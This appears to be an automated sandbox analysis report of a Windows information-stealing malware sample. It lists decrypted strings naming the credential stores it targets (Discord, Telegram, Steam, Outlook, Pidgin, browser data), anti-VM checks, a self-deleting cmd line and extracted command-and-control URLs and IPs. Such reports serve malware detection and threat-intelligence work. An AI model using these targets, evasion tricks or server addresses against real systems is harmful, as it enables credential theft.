Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Architecture:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - UserName:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Computer Name:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Local Time:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - UTC:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Language:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Keyboards:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Laptop:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Running Path:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - CPU:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Threads:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Cores:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - RAM:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Display Resolution:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - GPU:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: User Agents:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Installed Apps:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: All Users:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Current User:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Process List:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: system_info.txt
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: freebl3.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: mozglue.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: msvcp140.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: nss3.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: softokn3.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: vcruntime140.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \Temp\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: .exe
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: runas
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: open
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: /c start
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %DESKTOP%
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %APPDATA%
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %USERPROFILE%
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %PROGRAMFILES%
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %RECENT%
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: *.lnk
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: files
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \discord\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: key_datas
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: map*
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Telegram
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Tox
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: *.tox
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: *.ini
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Password
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: 00000001
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: 00000002
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: 00000003
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: 00000004
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Pidgin
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \.purple\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: accounts.xml
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: token:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SteamPath
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \config\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ssfn*
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: config.vdf
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: loginusers.vdf
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \Steam\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sqlite3.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: browsers
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: done
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: soft
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: https
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: POST
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HTTP/1.1
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Content-Disposition: form-data; name="
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: hwid
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: build
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: token
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: file_name
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: file
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: message
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: screenshot.jpg
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetProcAddress
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: LoadLibraryA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: lstrcatA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: OpenEventA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateEventA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CloseHandle
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Sleep
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VirtualFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetSystemInfo
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VirtualAlloc
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HeapAlloc
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetComputerNameA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: lstrcpyA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetProcessHeap
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetCurrentProcess
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: lstrlenA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ExitProcess
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetSystemTime
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: advapi32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: gdi32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: user32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: crypt32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ntdll.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetUserNameA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateDCA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetDeviceCaps
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ReleaseDC
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sscanf
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VMwareVMware
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HAL9TH
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: JohnDoe
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DISPLAY
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: http://85.28.47.31
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: silence
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: /5499d72b3a3e55be.php
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: /8405906461a5200c/
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sila
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetFileAttributesA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalLock
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HeapFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetFileSize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalSize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: IsWow64Process
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Process32Next
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetLocalTime
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: FreeLibrary
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Process32First
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DeleteFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: FindNextFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: LocalFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: FindClose
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: LocalAlloc
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetFileSizeEx
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ReadFile
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SetFilePointer
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: WriteFile
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: FindFirstFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CopyFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VirtualProtect
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetLastError
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: lstrcpynA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalAlloc
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: OpenProcess
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: TerminateProcess
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: gdiplus.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ole32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: bcrypt.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: wininet.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: shlwapi.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: shell32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: psapi.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SelectObject
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BitBlt
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DeleteObject
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdiplusStartup
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdiplusShutdown
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipDisposeImage
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CoUninitialize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CoInitialize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CoCreateInstance
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptDecrypt
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptSetProperty
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetWindowRect
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetDesktopWindow
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetDC
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CloseWindow
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: wsprintfA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CharToOemW
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: wsprintfW
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegQueryValueExA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegCloseKey
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegEnumValueA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CryptUnprotectData
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ShellExecuteExA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetConnectA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetCloseHandle
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetOpenA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HttpSendRequestA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetReadFile
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: StrCmpCA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: StrStrA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: StrCmpCW
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 0_2_00409BB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 0_2_00418940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 0_2_0040C660
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00407280
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00409B10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C5B6C80

Compliance

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Unpacked PE file: 20.2.624f4d727e.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Unpacked PE file: 24.2.624f4d727e.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Unpacked PE file: 34.2.624f4d727e.exe.400000.0.unpack
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49803 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2401826383.000000006C61D000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2401826383.000000006C61D000.00000002.00000001.01000000.00000008.sdmp
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004139B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004143F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 0_2_00414050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004133C0
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: firefox.exe Memory has grown: Private usage: 1MB later: 225MB

Networking

Source: Malware configuration extractor URLs: http://85.28.47.31/5499d72b3a3e55be.php
Source: Malware configuration extractor URLs: http://85.28.47.31silence
Source: Malware configuration extractor IPs: 185.215.113.19
